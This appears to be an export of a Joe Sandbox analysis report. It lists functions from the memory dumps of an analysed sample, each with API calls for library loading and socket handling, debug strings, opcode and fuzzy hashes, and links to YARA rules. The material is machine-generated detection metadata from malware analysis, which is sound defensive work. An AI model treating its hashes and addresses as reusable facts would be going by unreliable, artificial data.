String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: b129290725b7a4eed0bc88a27846854925b358a8e0c638c3c609fff8d412ed50
Instruction ID: 35818ad1640035697ecfc5d30a2ab8c6021a21d44b4be327280e047dbb852e85
Opcode Fuzzy Hash: b129290725b7a4eed0bc88a27846854925b358a8e0c638c3c609fff8d412ed50
Instruction Fuzzy Hash: 91F0A29BB0B64B82FA03EF45B8203B913126F0AFC0F084131DD4C47796EE2CE5568308

Function 00007FFDAC0F3D33 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDAC0F3D53

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

GetLastError.KERNEL32 ref: 00007FFDAC0F3D86

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFDAC0F3D73
module_get_proc, xrefs: 00007FFDAC0F3D6C, 00007FFDAC0F3D96
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFDAC0F3D9D

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 884f5832a0a4ec45437eaf3a3320f14c4d5bce9836479d65f6e3fb68efeab03e
Instruction ID: 7dd5d024bcd86ab11a4fe36699a657fd4d035803959d3df9e16f20c5892f2d3a
Opcode Fuzzy Hash: 884f5832a0a4ec45437eaf3a3320f14c4d5bce9836479d65f6e3fb68efeab03e
Instruction Fuzzy Hash: A0F0D195B0F60391FE065B0AB8601A552126F04FF4F488035DC4C0B797EF2CE696834C

Function 00007FF70CAD2283 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,0000021B15D113D0,?,00007FF70CAD292B), ref: 00007FF70CAD22A3

Part of subcall function 00007FF70CAD2EF2: fwrite.MSVCRT ref: 00007FF70CAD2F9E
Part of subcall function 00007FF70CAD2EF2: fflush.MSVCRT ref: 00007FF70CAD2FAA

GetLastError.KERNEL32(?,?,00000000,0000021B15D113D0,?,00007FF70CAD292B), ref: 00007FF70CAD22D6

Strings

module_get_proc, xrefs: 00007FF70CAD22BC, 00007FF70CAD22E6
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF70CAD22C3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF70CAD22ED

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 1d2a1104b0b89a8048ea47d9da957c90726d30bd41cfabef788588989ec09e42
Instruction ID: 33c2bf4e07e9282177ee4832a6375651c6b2ff7b42baf1a7417bb1e64d5027be
Opcode Fuzzy Hash: 1d2a1104b0b89a8048ea47d9da957c90726d30bd41cfabef788588989ec09e42
Instruction Fuzzy Hash: 83F081D0A0965741FA516749FC00AF5E6217F94BD8F844131DC4E0BB99EF6CE946E360

Function 00007FFDA55729B3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDA55729D3

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

GetLastError.KERNEL32 ref: 00007FFDA5572A06

Strings

module_get_proc, xrefs: 00007FFDA55729EC, 00007FFDA5572A16
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFDA55729F3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFDA5572A1D

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: c43f853d1552a5ff4b4b8e538862f6f42e45c1af654496a4ce4eebebe3d73d5e
Instruction ID: 59eb383a07346334566f15ddaeb4bf27f032e097b5c1da8922038dac019c1184
Opcode Fuzzy Hash: c43f853d1552a5ff4b4b8e538862f6f42e45c1af654496a4ce4eebebe3d73d5e
Instruction Fuzzy Hash: 46F08B98B0F64BC2FA234F66A8207A552516F46FC8F484431ED4C0BB96EF2CE5668308

Function 00007FFDA5BA50D3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDA5BA50F3

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

GetLastError.KERNEL32 ref: 00007FFDA5BA5126

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFDA5BA5113
module_get_proc, xrefs: 00007FFDA5BA510C, 00007FFDA5BA5136
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFDA5BA513D

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 9f3b3311bb7c84406ef1a4f49946181f5cc7e38f5bca5baaaf70642eec26798c
Instruction ID: 26b1435e8b424e667d3d6abc3823907796c2971f914d1d6ef5ef2a3e597f0379
Opcode Fuzzy Hash: 9f3b3311bb7c84406ef1a4f49946181f5cc7e38f5bca5baaaf70642eec26798c
Instruction Fuzzy Hash: 80F0D691B0A60F87FE118B45F8203BA52117F1AFC2F154431DD4D0B7A6FE2DE6468308

Function 00007FFDAC1276B3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFDAC1276D3

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

GetLastError.KERNEL32 ref: 00007FFDAC127706

Strings

[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFDAC1276F3
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFDAC12771D
module_get_proc, xrefs: 00007FFDAC1276EC, 00007FFDAC127716

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 1388ab471dc190be0225dc785bda30e6ec2d4b5f9edc99cec429349fc300884f
Instruction ID: b5931d12749e4c9c03e6f25c8ee4f114d589e114125c558be94dd1ca1955a985
Opcode Fuzzy Hash: 1388ab471dc190be0225dc785bda30e6ec2d4b5f9edc99cec429349fc300884f
Instruction Fuzzy Hash: 5EF0D69AB0B603C1FA835746E9242B612D16F44BE4F184031CC8C4B756EE2CE542C348

Function 00007FFDA55ABC64 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDA55ABC72

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

GetLastError.KERNEL32 ref: 00007FFDA55ABC9E

Strings

module_load, xrefs: 00007FFDA55ABC86, 00007FFDA55ABCAA
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFDA55ABC8D
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFDA55ABCB1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: b2c0e035ea19c47a2298e704a7d5ddf11d637e265ee472e8a91510dc7967efe9
Instruction ID: 61fe7e435ad3fcc34ef42c2c5095414997c23935b1f2fcad9ec8dad1bde24e4e
Opcode Fuzzy Hash: b2c0e035ea19c47a2298e704a7d5ddf11d637e265ee472e8a91510dc7967efe9
Instruction Fuzzy Hash: 15F09AA8F0B60F92FE239F16E8786B41250AF07FA4B490830C90C16B93FE5DA5858348

Function 00007FFDA55D4DF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDA55D4E02

Part of subcall function 00007FFDA55D9DC2: fwrite.MSVCRT ref: 00007FFDA55D9E6E
Part of subcall function 00007FFDA55D9DC2: fflush.MSVCRT ref: 00007FFDA55D9E7A

GetLastError.KERNEL32 ref: 00007FFDA55D4E2E

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFDA55D4E1D
module_load, xrefs: 00007FFDA55D4E16, 00007FFDA55D4E3A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFDA55D4E41

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 66375759403483c956752b67c058d5ec8f77d968b7f2071a1f9f258b69cb3baf
Instruction ID: 8f06f431d0d73e2b9c2e16b024db95352a10b336706bdf570111f97f54e480b7
Opcode Fuzzy Hash: 66375759403483c956752b67c058d5ec8f77d968b7f2071a1f9f258b69cb3baf
Instruction Fuzzy Hash: 90F09A6BF0B68FD6ED13EF6AA860BB413109F5BF80B480430DD0C06357ED1CA5958348

Function 00007FFDAC0F3DB4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDAC0F3DC2

Part of subcall function 00007FFDAC0F1352: fwrite.MSVCRT ref: 00007FFDAC0F13FE
Part of subcall function 00007FFDAC0F1352: fflush.MSVCRT ref: 00007FFDAC0F140A

GetLastError.KERNEL32 ref: 00007FFDAC0F3DEE

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFDAC0F3E01
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFDAC0F3DDD
module_load, xrefs: 00007FFDAC0F3DD6, 00007FFDAC0F3DFA

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 2e131db1d26787532c87755231068629693fab26e255b15e7684d498ad26bbed
Instruction ID: a18ff315723c17a5f0f3c10da2cecc19ef0d75a40682ff8792f770a65bf68b63
Opcode Fuzzy Hash: 2e131db1d26787532c87755231068629693fab26e255b15e7684d498ad26bbed
Instruction Fuzzy Hash: 17F09411F0B60390FE1AA72AB8A04A016006F04BF0F888438CC0C0A753EE2CEAC68358

Function 00007FFDA5572A34 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDA5572A42

Part of subcall function 00007FFDA55740D2: fwrite.MSVCRT ref: 00007FFDA557417E
Part of subcall function 00007FFDA55740D2: fflush.MSVCRT ref: 00007FFDA557418A

GetLastError.KERNEL32 ref: 00007FFDA5572A6E

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFDA5572A81
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFDA5572A5D
module_load, xrefs: 00007FFDA5572A56, 00007FFDA5572A7A

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: eebc1a5d766f2079d4744cae82bcb5895402705acf0259eaf803f7c43288c065
Instruction ID: 78cd91f4a83f1b3b7c64dd8f8f1ece98b25933666f8b307a3e34ddf7320403e1
Opcode Fuzzy Hash: eebc1a5d766f2079d4744cae82bcb5895402705acf0259eaf803f7c43288c065
Instruction Fuzzy Hash: 0DF03A19B0FA9F81E9539F66E860AA417506F07F84F884871DD0C17B53EFACA5959308

Function 00007FFDA5BA5154 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDA5BA5162

Part of subcall function 00007FFDA5BA2072: fwrite.MSVCRT ref: 00007FFDA5BA211E
Part of subcall function 00007FFDA5BA2072: fflush.MSVCRT ref: 00007FFDA5BA212A

GetLastError.KERNEL32 ref: 00007FFDA5BA518E

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFDA5BA517D
module_load, xrefs: 00007FFDA5BA5176, 00007FFDA5BA519A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFDA5BA51A1

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 0ba89c39d69df97c86f002b010dad634f4ea07f5c30fe7e47cfaeb9636bb7c5d
Instruction ID: 3cfaa628df2f9baaac77771366c1c4816ec5c12cda34706d2ef12293ab152266
Opcode Fuzzy Hash: 0ba89c39d69df97c86f002b010dad634f4ea07f5c30fe7e47cfaeb9636bb7c5d
Instruction Fuzzy Hash: 39F01760F0BA0F9AEE219B56A8717B512506F17F82F490931C90D167A6FD6DA6868308

Function 00007FFDAC121462 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28networkCOMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FFDAC121470
WSAGetLastError.WS2_32 ref: 00007FFDAC121499

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d), xrefs: 00007FFDAC1214B7
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFDAC121485
sock_shutdown, xrefs: 00007FFDAC12147E, 00007FFDAC1214B0

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteshutdown
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
API String ID: 2143829457-932964775
Opcode ID: 57c9f97ca487b04b81c438daf99dc390862ecc07b5533c1be0a8e36cbe07bb5e
Instruction ID: 4cafa9019b940ed7448fb50125cdd16145c9bcbc7303f1e7d6f035b0d832e779
Opcode Fuzzy Hash: 57c9f97ca487b04b81c438daf99dc390862ecc07b5533c1be0a8e36cbe07bb5e
Instruction Fuzzy Hash: BFF0B4A3F0E84391F652A716E8640B61B516F617F4F644531D84D523A3EF2CE9468308

Function 00007FFDAC127734 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDAC127742

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

GetLastError.KERNEL32 ref: 00007FFDAC12776E

Strings

module_load, xrefs: 00007FFDAC127756, 00007FFDAC12777A
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFDAC127781
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFDAC12775D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 2313a31a48575485783fdb08043dabcbb468791f70f24699168a91efbca71d3e
Instruction ID: 6b6809dcf84eb18fcc713cad60da1c29caed6776218f56954b3f0251f23ed7f2
Opcode Fuzzy Hash: 2313a31a48575485783fdb08043dabcbb468791f70f24699168a91efbca71d3e
Instruction Fuzzy Hash: D5F0BE9AF0BA07C0FA83A75AE9349B122806F45BF8F080530CC4C17357ED1CE5428388

Function 00007FFDAC1214C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FFDAC1214E6
WSAGetLastError.WS2_32 ref: 00007FFDAC121509

Part of subcall function 00007FFDAC1277A2: fwrite.MSVCRT ref: 00007FFDAC12784E
Part of subcall function 00007FFDAC1277A2: fflush.MSVCRT ref: 00007FFDAC12785A

Strings

[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDAC12151C
[D] (%s) -> Done(sock=0x%llx), xrefs: 00007FFDAC1214FB
sock_close, xrefs: 00007FFDAC1214F4, 00007FFDAC121515

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastclosesocketfflushfwrite
String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
API String ID: 152032778-2221966578
Opcode ID: fd5638db403456608400802e24ae7212d6ef097be0609a3bcd527b22d91f44d7
Instruction ID: ef02937177247d77fa55d6f5c79173f652c73336025a5635822401d32e963c8d
